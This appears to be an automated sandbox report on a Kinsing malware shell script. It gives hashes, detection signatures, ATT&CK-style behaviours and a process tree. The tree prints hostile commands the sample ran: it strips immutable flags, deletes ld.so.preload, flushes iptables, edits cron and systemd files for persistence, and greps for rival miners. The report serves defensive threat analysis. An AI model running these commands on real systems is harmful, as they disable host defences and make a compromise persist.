Analysis
-
max time kernel
92s -
max time network
117s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/02/2025, 02:32
Static task
static1
Behavioral task
behavioral1
Sample
41514012cc5d28caacffb293409e932670a9104ba31971d8838e0f228e9d93d8.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
41514012cc5d28caacffb293409e932670a9104ba31971d8838e0f228e9d93d8.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
41514012cc5d28caacffb293409e932670a9104ba31971d8838e0f228e9d93d8.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
41514012cc5d28caacffb293409e932670a9104ba31971d8838e0f228e9d93d8.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
41514012cc5d28caacffb293409e932670a9104ba31971d8838e0f228e9d93d8.sh
-
Size
15KB
-
MD5
c61f2123e8df31ddb461982515ba20be
-
SHA1
7dd001f290f63e8cf174c2f5b63d2f06b085d397
-
SHA256
41514012cc5d28caacffb293409e932670a9104ba31971d8838e0f228e9d93d8
-
SHA512
3a711cfe7dcec640ca00c99b7d11f18ee5d50b1577b3636e7ab42ca3f1a788ea02c04eb4d3b7f45e315d7c8d141f49c265a1cbfd788528fbbadbdcf65e9eeabc
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwd:trgXux7YJDj8OoJwd
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral4/files/fstream-19.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral4/files/fstream-18.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload 41514012cc5d28caacffb293409e932670a9104ba31971d8838e0f228e9d93d8.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1727 chmod 1728 chmod 1701 chmod 1703 chmod 1712 chmod 1714 chmod 1719 chmod 1721 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1729 41514012cc5d28caacffb293409e932670a9104ba31971d8838e0f228e9d93d8.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 729 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1449 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1612 xargs 1458 uname 1497 xargs 1540 xargs 1559 xargs 1565 xargs 1621 xargs 1690 xargs 1482 xargs 1508 xargs 1571 xargs 1628 sed 1633 xargs 1513 xargs 1616 sed 1637 sed 1695 xargs 1487 xargs 1503 xargs 1547 xargs 1619 sed 1634 sed 1639 xargs 1679 xargs 1606 xargs 1609 xargs 1492 xargs 1518 xargs 1603 xargs 1651 xargs 715 chattr 1535 xargs 1604 sed 1631 sed 1636 xargs 1656 xargs 723 chattr 726 chattr 1528 xargs 1553 xargs 1613 sed 1615 xargs 1523 xargs 1607 sed 1610 sed 1618 xargs 1625 sed 1627 xargs 1630 xargs 1668 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.cdG6AK crontab File opened for modification /var/spool/cron/crontabs/tmp.prq8vK crontab File opened for modification /var/spool/cron/crontabs/tmp.Ju8itD crontab File opened for modification /var/spool/cron/crontabs/tmp.j6xwXF crontab File opened for modification /var/spool/cron/crontabs/tmp.ZA3h6Y crontab File opened for modification /var/spool/cron/crontabs/tmp.DtmWeI crontab File opened for modification /var/spool/cron/crontabs/tmp.HiQ035 crontab File opened for modification /var/spool/cron/crontabs/tmp.0ECs2R crontab File opened for modification /var/spool/cron/crontabs/tmp.43v18v crontab File opened for modification /var/spool/cron/crontabs/tmp.OIMvGc crontab File opened for modification /var/spool/cron/crontabs/tmp.iQicEz crontab File opened for modification /var/spool/cron/crontabs/tmp.Ojmzr2 crontab File opened for modification /var/spool/cron/crontabs/tmp.0UYchQ crontab File opened for modification /var/spool/cron/crontabs/tmp.w5CVcq crontab File opened for modification /var/spool/cron/crontabs/tmp.CXG6s6 crontab File opened for modification /var/spool/cron/crontabs/tmp.RCAhra crontab File opened for modification /var/spool/cron/crontabs/tmp.fvzmKx crontab File opened for modification /var/spool/cron/crontabs/tmp.CGhvcd crontab File opened for modification /var/spool/cron/crontabs/tmp.O8dbNv crontab File opened for modification /var/spool/cron/crontabs/tmp.HFA5eb crontab File opened for modification /var/spool/cron/crontabs/tmp.d4VWKh crontab File opened for modification /var/spool/cron/crontabs/tmp.F3NvAb crontab File opened for modification /var/spool/cron/crontabs/tmp.YscoxZ crontab File opened for modification /var/spool/cron/crontabs/tmp.KXKvZ4 crontab File opened for modification /var/spool/cron/crontabs/tmp.DQYciK crontab File opened for modification /var/spool/cron/crontabs/tmp.cq8Pg4 crontab File opened for modification /var/spool/cron/crontabs/tmp.27ZaJE crontab File opened for modification /var/spool/cron/crontabs/tmp.0ewFz0 crontab File opened for modification /var/spool/cron/crontabs/tmp.rmR5Vm crontab File opened for modification /var/spool/cron/crontabs/tmp.xnXIHx crontab File opened for modification /var/spool/cron/crontabs/tmp.ekRMYi crontab File opened for modification /var/spool/cron/crontabs/tmp.UjQybU crontab File opened for modification /var/spool/cron/crontabs/tmp.EYaRii crontab File opened for modification /var/spool/cron/crontabs/tmp.9JXBUe crontab File opened for modification /var/spool/cron/crontabs/tmp.BUSBUF crontab File opened for modification /var/spool/cron/crontabs/tmp.jov7d7 crontab File opened for modification /var/spool/cron/crontabs/tmp.NEjxVu crontab File opened for modification /var/spool/cron/crontabs/tmp.HtHE3M crontab File opened for modification /var/spool/cron/crontabs/tmp.3A1Bfe crontab File opened for modification /var/spool/cron/crontabs/tmp.1xBeQz crontab File opened for modification /var/spool/cron/crontabs/tmp.SM0PT6 crontab File opened for modification /var/spool/cron/crontabs/tmp.qRGWXR crontab File opened for modification /var/spool/cron/crontabs/tmp.iRme01 crontab File opened for modification /var/spool/cron/crontabs/tmp.ayHjdj crontab File opened for modification /var/spool/cron/crontabs/tmp.IblP4x crontab File opened for modification /var/spool/cron/crontabs/tmp.TUGBSd crontab File opened for modification /var/spool/cron/crontabs/tmp.FXrbSt crontab File opened for modification /var/spool/cron/crontabs/tmp.UYPAFD crontab File opened for modification /var/spool/cron/crontabs/tmp.IQIe4M crontab File opened for modification /var/spool/cron/crontabs/tmp.STMUg5 crontab File opened for modification /var/spool/cron/crontabs/tmp.kWPcYi crontab File opened for modification /var/spool/cron/crontabs/tmp.bh2Ola crontab File opened for modification /var/spool/cron/crontabs/tmp.fWzfSg crontab File opened for modification /var/spool/cron/crontabs/tmp.dXFJdq crontab File opened for modification /var/spool/cron/crontabs/tmp.XQT8MB crontab File opened for modification /var/spool/cron/crontabs/tmp.Ek7d9X crontab File opened for modification /var/spool/cron/crontabs/tmp.S3ISl7 crontab File opened for modification /var/spool/cron/crontabs/tmp.N5P3C2 crontab File opened for modification /var/spool/cron/crontabs/tmp.XmYLhn crontab File opened for modification /var/spool/cron/crontabs/tmp.5voLGf crontab File opened for modification /var/spool/cron/crontabs/tmp.ZInTl2 crontab File opened for modification /var/spool/cron/crontabs/tmp.QZiaVd crontab File opened for modification /var/spool/cron/crontabs/tmp.0Zfoza crontab File opened for modification /var/spool/cron/crontabs/tmp.gJVmCd crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service 41514012cc5d28caacffb293409e932670a9104ba31971d8838e0f228e9d93d8.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1499 ps 1509 ps 1519 ps 1524 ps 1536 ps 1599 ps 1647 ps 1504 ps 1514 ps 1531 ps 1652 ps 1691 ps -
description ioc Process File opened for reading /proc/110/cmdline ps File opened for reading /proc/708/cmdline pkill File opened for reading /proc/36/status pkill File opened for reading /proc/1/stat ps File opened for reading /proc/1523/stat ps File opened for reading /proc/9/status pkill File opened for reading /proc/380/status pkill File opened for reading /proc/326/status pkill File opened for reading /proc/679/status ps File opened for reading /proc/15/cmdline ps File opened for reading /proc/331/stat ps File opened for reading /proc/74/cmdline ps File opened for reading /proc/9/status ps File opened for reading /proc/12/cmdline ps File opened for reading /proc/72/status pkill File opened for reading /proc/72/status ps File opened for reading /proc/687/stat ps File opened for reading /proc/filesystems ls File opened for reading /proc/71/cmdline pkill File opened for reading /proc/110/stat ps File opened for reading /proc/36/status ps File opened for reading /proc/filesystems pkill File opened for reading /proc/381/status pkill File opened for reading /proc/687/stat ps File opened for reading /proc/filesystems ls File opened for reading /proc/326/cmdline ps File opened for reading /proc/706/cmdline pkill File opened for reading /proc/37/stat ps File opened for reading /proc/216/status ps File opened for reading /proc/124/status pkill File opened for reading /proc/20/cmdline pkill File opened for reading /proc/16/cmdline pkill File opened for reading /proc/330/status pkill File opened for reading /proc/76/cmdline pkill File opened for reading /proc/14/status ps File opened for reading /proc/707/status pkill File opened for reading /proc/1593/cmdline pkill File opened for reading /proc/12/status ps File opened for reading /proc/uptime ps File opened for reading /proc/13/status pkill File opened for reading /proc/330/cmdline pkill File opened for reading /proc/334/status pkill File opened for reading /proc/5/cmdline pkill File opened for reading /proc/174/stat ps File opened for reading /proc/37/cmdline pkill File opened for reading /proc/11/cmdline pkill File opened for reading /proc/334/status pkill File opened for reading /proc/82/cmdline pkill File opened for reading /proc/82/status pkill File opened for reading /proc/14/cmdline ps File opened for reading /proc/216/status pkill File opened for reading /proc/381/cmdline pkill File opened for reading /proc/82/cmdline pkill File opened for reading /proc/71/cmdline pkill File opened for reading /proc/20/cmdline pkill File opened for reading /proc/10/status pkill File opened for reading /proc/78/stat ps File opened for reading /proc/74/stat ps File opened for reading /proc/15/status pkill File opened for reading /proc/17/status pkill File opened for reading /proc/110/status ps File opened for reading /proc/12/cmdline pkill File opened for reading /proc/665/status pkill File opened for reading /proc/20/stat ps -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1404 ls 1834 sed
Processes
-
/tmp/41514012cc5d28caacffb293409e932670a9104ba31971d8838e0f228e9d93d8.sh/tmp/41514012cc5d28caacffb293409e932670a9104ba31971d8838e0f228e9d93d8.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:710 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:715
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:721
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:723
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:726
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:729
-
-
/bin/grepgrep exe2⤵PID:738
-
-
/bin/lsls -latrh /proc/12⤵PID:737
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:742
-
-
/bin/grepgrep exe2⤵PID:745
-
-
/bin/lsls -latrh /proc/102⤵PID:744
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:749
-
-
/bin/lsls -latrh /proc/112⤵PID:751
-
-
/bin/grepgrep exe2⤵PID:752
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:756
-
-
/bin/lsls -latrh /proc/1102⤵PID:759
-
-
/bin/grepgrep exe2⤵PID:760
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:762
-
-
/bin/grepgrep exe2⤵PID:766
-
-
/bin/lsls -latrh /proc/122⤵PID:765
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:768
-
-
/bin/grepgrep exe2⤵PID:771
-
-
/bin/lsls -latrh /proc/1232⤵PID:770
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:774
-
-
/bin/grepgrep exe2⤵PID:777
-
-
/bin/lsls -latrh /proc/1242⤵PID:776
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:779
-
-
/bin/grepgrep exe2⤵PID:782
-
-
/bin/lsls -latrh /proc/132⤵PID:781
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:784
-
-
/bin/grepgrep exe2⤵PID:787
-
-
/bin/lsls -latrh /proc/142⤵PID:786
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:789
-
-
/bin/grepgrep exe2⤵PID:792
-
-
/bin/lsls -latrh /proc/152⤵PID:791
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:794
-
-
/bin/grepgrep exe2⤵PID:797
-
-
/bin/lsls -latrh /proc/1552⤵PID:796
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:799
-
-
/bin/grepgrep exe2⤵PID:802
-
-
/bin/lsls -latrh /proc/1572⤵PID:801
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:804
-
-
/bin/grepgrep exe2⤵PID:807
-
-
/bin/lsls -latrh /proc/162⤵PID:806
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:809
-
-
/bin/grepgrep exe2⤵PID:812
-
-
/bin/lsls -latrh /proc/172⤵PID:811
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:814
-
-
/bin/grepgrep exe2⤵PID:817
-
-
/bin/lsls -latrh /proc/1742⤵PID:816
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:819
-
-
/bin/grepgrep exe2⤵PID:822
-
-
/bin/lsls -latrh /proc/182⤵PID:821
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:824
-
-
/bin/grepgrep exe2⤵PID:827
-
-
/bin/lsls -latrh /proc/192⤵PID:826
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:829
-
-
/bin/grepgrep exe2⤵PID:832
-
-
/bin/lsls -latrh /proc/22⤵PID:831
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:834
-
-
/bin/grepgrep exe2⤵PID:837
-
-
